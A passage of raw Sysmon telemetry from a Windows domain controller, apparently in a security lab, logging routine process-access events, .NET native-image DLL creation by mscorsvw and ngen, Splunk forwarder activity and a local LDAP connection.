21:04:54.825{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=10C262DDBA9ECF5ED2DE552E9EA9A077,SHA256=513841FBE26EFEF860502C13B8EFCCF74D6000F78CA309A79B5BF4646C9867FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.793{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F6-60D3-1204-00000000CF01}1072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.778{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F6-60D3-1204-00000000CF01}1072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.778{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F6-60D3-1204-00000000CF01}1072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:54.747{4DB9351A-A1F6-60D3-1104-00000000CF01}4960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1360-0\Microsoft.Windows.ServerManager.RemoteAccess.Plugin.dll2021-06-23 21:04:54.747 10341000x800000000000000021111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.575{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F6-60D3-1104-00000000CF01}4960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.559{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F6-60D3-1104-00000000CF01}4960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.559{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F6-60D3-1104-00000000CF01}4960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.497{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F6-60D3-1004-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.481{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F6-60D3-1004-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.481{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F6-60D3-1004-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:54.465{4DB9351A-A1F6-60D3-0F04-00000000CF01}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ee8-0\Microsoft.Windows.ServerManager.PrintingServer.Plugin.dll2021-06-23 21:04:54.465 10341000x800000000000000021104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.387{4DB9351A-A1F5-60D3-0D04-00000000CF01}66526624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.356{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F6-60D3-0F04-00000000CF01}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.325{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1F6-60D3-0F04-00000000CF01}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.325{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F6-60D3-0F04-00000000CF01}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021100Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.262{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F6-60D3-0E04-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000021099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:52.583{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61432-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000021098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:52.583{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61432-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 10341000x800000000000000021097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.247{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F6-60D3-0E04-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.247{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F6-60D3-0E04-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:54.215{4DB9351A-A1F5-60D3-0C04-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a50-0\Microsoft.Windows.ServerManager.PowerShell.dll2021-06-23 21:04:54.215 10341000x800000000000000021094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.137{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1F5-60D3-0D04-00000000CF01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.122{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.122{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.122{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.122{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.122{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1F5-60D3-0D04-00000000CF01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.122{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1F5-60D3-0D04-00000000CF01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 